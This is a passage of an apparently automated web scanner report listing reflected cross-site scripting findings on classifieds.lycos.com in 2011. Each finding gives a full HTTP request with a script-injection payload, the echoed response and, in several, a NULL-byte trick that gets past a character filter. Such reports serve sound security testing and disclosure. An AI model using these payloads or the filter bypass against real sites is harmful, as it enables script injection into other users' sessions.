Path:   /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16927"><script>alert(1)</script>eb489a6e3c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893?16927"><script>alert(1)</script>eb489a6e3c3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:30 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fcoupe; path=/
Set-Cookie: classifieds[lastpage][0][name]=Coupes; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893?16927"><script>alert(1)</script>eb489a6e3c3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.219. http://classifieds.lycos.com/vehicle-car-mini_van/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-mini_van/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e32"><script>alert(1)</script>3f1c6acac78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-mini_van14e32"><script>alert(1)</script>3f1c6acac78/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-mini_van14e32"><script>alert(1)</script>3f1c6acac78/?mobile=1" rel="nofollow">
...[SNIP]...

1.220. http://classifieds.lycos.com/vehicle-car-mini_van/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-mini_van/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e995"><script>alert(1)</script>11a9fa7813b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-mini_van/?3e995"><script>alert(1)</script>11a9fa7813b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:18 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 93840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-mini_van/?3e995"><script>alert(1)</script>11a9fa7813b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.221. http://classifieds.lycos.com/vehicle-car-sedan/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3b74"><script>alert(1)</script>2118badbcb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedane3b74"><script>alert(1)</script>2118badbcb7/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedane3b74"><script>alert(1)</script>2118badbcb7/?mobile=1" rel="nofollow">
...[SNIP]...

1.222. http://classifieds.lycos.com/vehicle-car-sedan/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df4c"><script>alert(1)</script>2dade4d62cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/?6df4c"><script>alert(1)</script>2dade4d62cc=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 107258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/?6df4c"><script>alert(1)</script>2dade4d62cc=1&mobile=1" rel="nofollow">
...[SNIP]...

1.223. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af05e"><script>alert(1)</script>60e208c437b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedanaf05e"><script>alert(1)</script>60e208c437b/2011-honda-accord-23730-00-2416142889 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedanaf05e"><script>alert(1)</script>60e208c437b/2011-honda-accord-23730-00-2416142889?mobile=1" rel="nofollow">
...[SNIP]...

1.224. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0032914"><script>alert(1)</script>16bd371041b was submitted in the REST URL parameter 2. This input was echoed as 32914"><script>alert(1)</script>16bd371041b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889%0032914"><script>alert(1)</script>16bd371041b HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:40 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889%0032914"><script>alert(1)</script>16bd371041b?mobile=1" rel="nofollow">
...[SNIP]...

1.225. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c80"><script>alert(1)</script>6d947060cf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889?b9c80"><script>alert(1)</script>6d947060cf8=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:19 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/
Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889?b9c80"><script>alert(1)</script>6d947060cf8=1&mobile=1" rel="nofollow">
...[SNIP]...

1.226. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f126a"><script>alert(1)</script>9913767c13f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedanf126a"><script>alert(1)</script>9913767c13f/2011-honda-accord-24480-00-2416142887 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedanf126a"><script>alert(1)</script>9913767c13f/2011-honda-accord-24480-00-2416142887?mobile=1" rel="nofollow">
...[SNIP]...

1.227. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f7f14"><script>alert(1)</script>cef468bc4e7 was submitted in the REST URL parameter 2. This input was echoed as f7f14"><script>alert(1)</script>cef468bc4e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887%00f7f14"><script>alert(1)</script>cef468bc4e7 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887%00f7f14"><script>alert(1)</script>cef468bc4e7?mobile=1" rel="nofollow">
...[SNIP]...

1.228. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94981"><script>alert(1)</script>7d681b86df3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887?94981"><script>alert(1)</script>7d681b86df3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:24 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/
Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887?94981"><script>alert(1)</script>7d681b86df3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.229. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114aa"><script>alert(1)</script>9b2b6d60c7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan114aa"><script>alert(1)</script>9b2b6d60c7d/2011-honda-civic-19905-00-2416144203 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan114aa"><script>alert(1)</script>9b2b6d60c7d/2011-honda-civic-19905-00-2416144203?mobile=1" rel="nofollow">
...[SNIP]...

1.230. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003d11a"><script>alert(1)</script>7130122b1d6 was submitted in the REST URL parameter 2. This input was echoed as 3d11a"><script>alert(1)</script>7130122b1d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203%003d11a"><script>alert(1)</script>7130122b1d6 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203%003d11a"><script>alert(1)</script>7130122b1d6?mobile=1" rel="nofollow">
...[SNIP]...

1.231. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e66"><script>alert(1)</script>328e80c3280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203?38e66"><script>alert(1)</script>328e80c3280=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:13 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/
